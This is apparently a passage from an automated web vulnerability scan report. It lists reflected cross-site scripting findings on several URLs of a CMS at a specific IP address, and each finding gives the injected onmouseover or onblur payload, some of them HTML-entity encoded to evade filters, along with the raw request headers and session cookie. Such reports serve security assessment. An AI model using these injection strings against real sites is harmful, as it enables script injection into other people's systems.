  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/2.html

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html
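Request method GET
Affected parameter value1
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/user-deny-product-view-"%20onmouseover=%22dfbhmg(6510)%22%3e%20var=%20.html
2. Set parameter value1"%20onmouseover=%22dfbhmg(6510)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6510)
Request & response GET /index.php/user-deny-product-view-"%20onmouseover=%22dfbhmg(6510)%22%3e%20var=%20.html HTTP/1.1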
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/2.html

URL http://202.201.39.48/index.php/message-comment-article-22.mhtml
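Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6333)%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=dfbhmg(6333)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6333)
Request & response GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6333)%20var=%20.mhtml HTTP/1.1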
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/22.mhtml

URL http://202.201.39.48/index.php/message-comment-article-31.mhtml
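Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(7000)%22%3e%20var=%20.mhtml
2. Set parameter value0'%20onmouseover=%22dfbhmg(7000)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(7000)
Request & response GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(7000)%22%3e%20var=%20.mhtml HTTP/1.1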
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/31.mhtml

URL http://202.201.39.48/index.php/message-comment-article-37.mhtml
Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x35;%26%23x39;%26%23x29;%20.mhtml
2. Set parameter value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x35;%26%23x39;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6659)
Request & response GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x35;%26%23x39;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/37.mhtml

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml
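Request method GET
Affected parameter value1
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/user-deny-product-browse-"%20onmouseover=%22dfbhmg(6734)%22%3e%20var=%20.mhtml
2. Set parameter value1"%20onmouseover=%22dfbhmg(6734)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6734)
Request & response GET /index.php/user-deny-product-browse-"%20onmouseover=%22dfbhmg(6734)%22%3e%20var=%20.mhtml HTTP/1.1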
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml
Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=dfbhmg(6117)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml
2. Set parameter value0"%20onmouseover=dfbhmg(6117)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6117)
Request & response GET /index.php/user-deny-product-"%20onmouseover=dfbhmg(6117)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html

URL http://202.201.39.48/index.php/search-index--1.mhtml
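Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/search-index--"%20onmouseover=dfbhmg(6089)%20.mhtml
2. Set parameter value0"%20onmouseover=dfbhmg(6089)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6089)
Request & response GET /index.php/search-index--"%20onmouseover=dfbhmg(6089)%20.mhtml HTTP/1.1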
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search/index.php

URL http://202.201.39.48/index.php/search-index--1.html
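Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/search-index--"%20onmouseover=dfbhmg(6473)%20var=%20.html
2. Set parameter value0"%20onmouseover=dfbhmg(6473)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6473)
Request & response GET /index.php/search-index--"%20onmouseover=dfbhmg(6473)%20var=%20.html HTTP/1.1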
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search-index--1.mhtml

URL http://202.201.39.48/index.php/page/
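Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/page//"%20onmouseover=dfbhmg(6925)%20
2. Set parameter "%20onmouseover=dfbhmg(6925)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6925)
Request & response GET /index.php/page//"%20onmouseover=dfbhmg(6925)%20 HTTP/1.1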
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html

URL http://202.201.39.48/index.php/page/
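Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/page/;"%20onmouseover=%22dfbhmg(6112)%22%3e%20var=%20
2. Set parameter "%20onmouseover=%22dfbhmg(6112)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6112)
Request & response GET /index.php/page/;"%20onmouseover=%22dfbhmg(6112)%22%3e%20var=%20 HTTP/1.1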
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html

URL http://202.201.39.48/index.php/page/
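Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/page/"%20onmouseover=%22dfbhmg(6632)%22%3e%20
2. Set parameter "%20onmouseover=%22dfbhmg(6632)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6632)
Request & response GET /index.php/page/"%20onmouseover=%22dfbhmg(6632)%22%3e%20 HTTP/1.1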
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html

URL http://202.201.39.48/index.php/page/index.php
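Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Construct URL: http://202.201.39.48/index.php/page/index.php/"%20onmouseover=%22dfbhmg(6226)%22%3e%20
2. Set parameter "%20onmouseover=%22dfbhmg(6226)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6226)
Request & response GET /index.php/page/index.php/"%20onmouseover=%22dfbhmg(6226)%22%3e%20 HTTP/1.1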
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/15.html